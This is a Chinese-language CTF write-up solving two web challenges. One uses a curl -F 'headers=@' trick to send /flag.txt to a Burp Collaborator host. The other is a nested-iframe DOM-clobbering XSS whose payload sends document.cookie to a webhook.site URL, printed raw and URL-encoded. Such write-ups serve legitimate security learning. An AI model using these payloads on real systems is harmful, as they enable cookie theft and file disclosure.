自己就做出来两道,太菜了

RaaS-v1

文档阅读题

题目给了源码

最后命令拼接这里

foreach($formParams as $key => $value){
	if(preg_match("/^\w+$/",$key)){
		$cmd .= '-F ';
		$cmd .= escapeshellarg($key.'= '.$value);
	}
}

= 后面多了个空格,导致最后想通过 -F 参数上传文件失败

拼接后是这样的

curl --proto -file "http://127.0.0.1" -X "GET" -F "file= @/flag.txt"

多了空格导致发送的是字符串 @/flag.txt

直接阅读 curl 的官方文档发现这里

https://curl.se/docs/manpage.html#-F

You can add custom headers to the field by setting headers=, like

curl -F "submit=OK;headers=\"X-submit-type: OK\"" example.com

or

curl -F "submit=OK;headers=@headerfile" example.com

可以使用 headers

payload

http://raas-v1.asisctf.com:9000/?url=https://3sw5lub27zg8aeffl8bc7hupegk98y.burpcollaborator.net&method=POST&formParams[file]=submit=OK;headers=@/flag.txt

h.n.y

给了源码

index.html是这样的

<html>
	<head>
		<title>hi</title>
	</head>
	<body>
		<h1>definitely not vulnerable to XSS</h1>
		<div>
			MSG
		</div>
		<script nonce="$nonce$">
			try{
				eval(window.h.a.p.p.y._.n.e.w._.y.e.a.r._.h.a.c.k.e.r.s.toString())
			}catch(e){}
		</script>
	</body>
</html>

很明显的需要 dom clobbering

相关学习文章 https://blog.csdn.net/qq_38154820/article/details/106330275?utm_source=app&app_version=5.0.1&code=app_1562916241&uLinkId=usr1mkqgl919blen

这里安利一个工具

https://github.com/splitline/DOM-Clobber3r

用这个工具直接生成即可

image-20230106155433384

(题目由于有CSP的限制,所以这里利用 javascript:location.href='https://webhook.site/d3e541cd-3183-44a1-a437-db45aaf9ffb8/'+document.cookie 的跳转来外带flag)

注意把两边多余的引号去了,跳转的链接也有引号,不然解析会有问题

image-20230106151724743

最后还要注意的一点是 可能dom还没有加载完就执行 eval(window.h.a.p.p.y._.n.e.w._.y.e.a.r._.h.a.c.k.e.r.s.toString()) 了,所以最后需要再加几个 同步加载的 link 标签 <link rel="stylesheet" href="style.css">

exp:

<iframe name=h srcdoc="<iframe name=a srcdoc=&quot;<iframe name=p srcdoc=&amp;quot;<iframe name=p srcdoc=&amp;amp;quot;<iframe name=y srcdoc=&amp;amp;amp;quot;<iframe name=_ srcdoc=&amp;amp;amp;amp;quot;<iframe name=n srcdoc=&amp;amp;amp;amp;amp;quot;<iframe name=e srcdoc=&amp;amp;amp;amp;amp;amp;quot;<iframe name=w srcdoc=&amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=_ srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=y srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=e srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=a srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=r srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=_ srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=h srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=a srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=c srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=k srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=e srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=r srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<a id='s' href=javascript:location.href='https://webhook.site/d3e541cd-3183-44a1-a437-db45aaf9ffb8/'+document.cookie></a>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;quot;></iframe>&amp;amp;quot;></iframe>&amp;quot;></iframe>&quot;></iframe>"></iframe><link rel="stylesheet" href="style.css"><link rel="stylesheet" href="style.css"><link rel="stylesheet" href="style.css"><link rel="stylesheet" href="style.css"><link rel="stylesheet" href="style.css">

url编码后发送即可(题目对payload长度做了限制,还要把多余的换行去了)

http://5.75.142.234:9000/hack?p=http%3A%2F%2Flocalhost%3A9000%3Fp%3D%253Ciframe%2520name%253Dh%2520srcdoc%253D%2522%253Ciframe%2520name%253Da%2520srcdoc%253D%2526quot%253B%253Ciframe%2520name%253Dp%2520srcdoc%253D%2526amp%253Bquot%253B%253Ciframe%2520name%253Dp%2520srcdoc%253D%2526amp%253Bamp%253Bquot%253B%253Ciframe%2520name%253Dy%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253D_%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253Dn%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253De%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253Dw%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253D_%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253Dy%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253De%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253Da%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253Dr%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253D_%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253Dh%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253Da%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253Dc%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253Dk%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253De%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253Dr%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ca%2520id%253D's'%2520href%253Djavascript%253Alocation.href%253D'https%253A%252F%252Fwebhook.site%252Fd3e541cd-3183-44a1-a437-db45aaf9ffb8%252F'%252Bdocument.cookie%253E%253C%252Fa%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bquot%253B%253E%253C%252Fiframe%253E%2526quot%253B%253E%253C%252Fiframe%253E%2522%253E%253C%252Fiframe%253E%253Clink%2520rel%253D%2522stylesheet%2522%2520href%253D%2522style.css%2522%253E%253Clink%2520rel%253D%2522stylesheet%2522%2520href%253D%2522style.css%2522%253E%253Clink%2520rel%253D%2522stylesheet%2522%2520href%253D%2522style.css%2522%253E%253Clink%2520rel%253D%2522stylesheet%2522%2520href%253D%2522style.css%2522%253E%253Clink%2520rel%253D%2522stylesheet%2522%2520href%253D%2522style.css%2522%253E

1669baaf-2590-4abf-a879-2ad04f62cc59